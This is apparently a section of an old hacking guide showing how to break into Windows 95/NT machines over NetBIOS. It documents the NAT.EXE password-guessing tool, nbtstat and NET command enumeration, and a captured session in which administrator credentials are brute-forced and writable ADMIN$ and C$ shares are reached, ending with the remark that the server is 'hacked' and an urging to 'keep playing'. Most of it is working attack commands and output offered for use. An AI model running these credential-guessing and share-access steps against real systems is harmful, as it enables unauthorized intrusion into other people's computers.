This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation,
NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta
2.1. One of the components being used is NAT.EXEA discussion of the tool, it
switches, and common techniques follows:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
Switches:
-o Specify the output file. All results from the scan
will be written to the specified file, in addition to standard output.
-u Specify the file to read usernames from. Usernames will be read from the specified file when attempting to guess the password on the remote server.Usernames should appear one per line in the specified file.
-p Specify the file to read passwords from. Passwords will be read from the specified file when attempting to guess the password on the remote server.
Passwords should appear one per line in the specified file.<address>
Addresses should be specified in comma deliminated
format, with no spaces. Valid address specifica-
tions include:
hostname - "hostname" is added
127.0.0.1-127.0.0.3, adds addresses 127.0.0.1
through 127.0.0.3
127.0.0.1-3, adds addresses 127.0.0.1 through
127.0.0.3
127.0.0.1-3,7,10-20, adds addresses 127.0.0.1
through 127.0.0.3, 127.0.0.7, 127.0.0.10 through
127.0.0.20.
hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1
through 127.0.0.1
All combinations of hostnames and address ranges as
specified above are valid.
[8.0.1] Comparing NAT.EXE to Microsoft's own executables
[8.0.2] First, a look at NBTSTAT
First we look at the NBTSTAT command. This command was discussed in earlier
portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will
see a demonstration of how this tool is used and how it compares to other
Microsoft tools and non Microsoft tools.
What follows is pretty much a step by step guide to using NBTSTAT as well as
extra information. Again, if youre interested in more NBSTAT switches and
functions, view the [5.0.6] The Nbtstat Command portion of the book.
C:\nbtstat -A XXX.XX.XXX.XX
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Here is a partial NetBIOS 16th bit listing:
Computername <00> UNIQUE workstation service name
<00> GROUP domain name
Server <20> UNIQUE Server Service name
Computername <03> UNIQUE Registered by the messenger service. This is the
computername
to be added to the LMHOSTS file which is not necessary to use
NAT.EXE but is necessary if you would like to view the remote
computer in Network Neighborhood.
Username <03> Registered by the messenger service.
Domainname <1B> Registers the local computer as the master browser for the
domain
Domainname <1C> Registers the computer as a domain controller for the domain
(PDC or BDC)
Domainname <1D> Registers the local client as the local segments master
browser
for the domain
Domainname <1E> Registers as a Group NetBIOS Name
<BF> Network Monitor Name
<BE> Network Monitor Agent
<06> RAS Server
<1F> Net DDE
<21> RAS Client
[8.0.3] Intro to the NET commands
The NET command is a command that admins can execute through a dos window to
show information about servers, networks, shares, and connections. It also has a
number of command options that you can use to add user accounts and groups,
change domain settings, and configure shares. In this section, you will learn
about these NET commands, and you will also have the outline to a NET command
Batch file that can be used as a primitive network security analysis tool.
Before we continue on with the techniques, a discussion of the available options
will come first:
[8.0.4] Net Accounts: This command shows current settings for password, logon
limitations, and domain information. It also contains options for updating the
User accounts database and modifying password and logon requirements.
[8.0.5] Net Computer: This adds or deletes computers from a domains database.
[8.0.6] Net Config Server or Net Config Workstation: Displays config info
about the server service. When used without specifying Server or Workstation,
the command displays a list of configurable services.
[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET
PAUSE command.
[8.0.8] Net File: This command lists the open files on a server and has
options for closing shared files and removing file locks.
[8.0.9] Net Group: This displays information about group names and has
options you can use to add or modify global groups on servers.
[8.1.0] Net Help: Help with these commands
[8.1.1] Net Helpmsg message#: Get help with a particular net error or
function message.
[8.1.2] Net Localgroup: Use this to list local groups on servers. You can
also modify those groups.
[8.1.3] Net Name: This command shows the names of computers and users to
which messages are sent on the computer.
[8.1.4] Net Pause: Use this command to suspend a certain NT service.
[8.1.5] Net Print: Displays print jobs and shared queues.
[8.1.6] Net Send: Use this command to send messages to other users,
computers, or messaging names on the network.
[8.1.7] Net Session: Shows information about current sessions. Also has
commands for disconnecting certain sessions.
[8.1.8] Net Share: Use this command to list information about all resources
being shared on a computer. This command is also used to create network shares.
[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.
[8.2.0] Net Stop: Stops NT services, cancelling any connections the service
is using. Let it be known that stopping one service, may stop other services.
[8.2.1] Net Time: This command is used to display or set the time for a
computer or domain.
[8.2.2] Net Use: This displays a list of connected computers and has options
for connecting to and disconnecting from shared resources.
[8.2.3] Net User: This command will display a list of user accounts for the
computer, and has options for creating a modifying those accounts.
[8.2.4] Net View: This command displays a list of resources being shared on a
computer. Including netware servers.
[8.2.5] Special note on DOS and older Windows Machines: The commands listed
above are available to Windows NT Servers and Workstation, DOS and older Windows
clients have these NET commands available:
Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers.)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View
For this section, the command being used is the NET VIEW and NET USE
commands.
[8.2.6] Actual NET VIEW and NET USE Screen Captures during a hack.
C:\net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
NOTE: The C$ ADMIN$ and IPC$ are hidden and are not shown.
C:\net use /?
The syntax of this command is:
NET USE [devicename *] [\\computername\sharename[\volume] [password *]]
[/USER:[domainname\]username]
[[/DELETE] [/PERSISTENT:{YES NO}]]
NET USE [devicename *] [password *]] [/HOME]
NET USE [/PERSISTENT:{YES NO}]
C:\net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.
C:\unzipped\nat10bin>net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \\XXX.XX.XXX.XX\test Microsoft Windows Network
OK \\XXX.XX.XXX.XX\test Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information
listed here is an actual capture of the activity. The IP addresses have been
changed to protect, well, us.
C:\nat -o output.txt -u userlist.txt -p passlist.txt
XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password:
`password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share
Test Disk:
[*]--- This machine has a browse list:
Server Comment
--------- -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done,
the server is hacked. If not, keep playing. You will be surprised what you find
out.
Posts
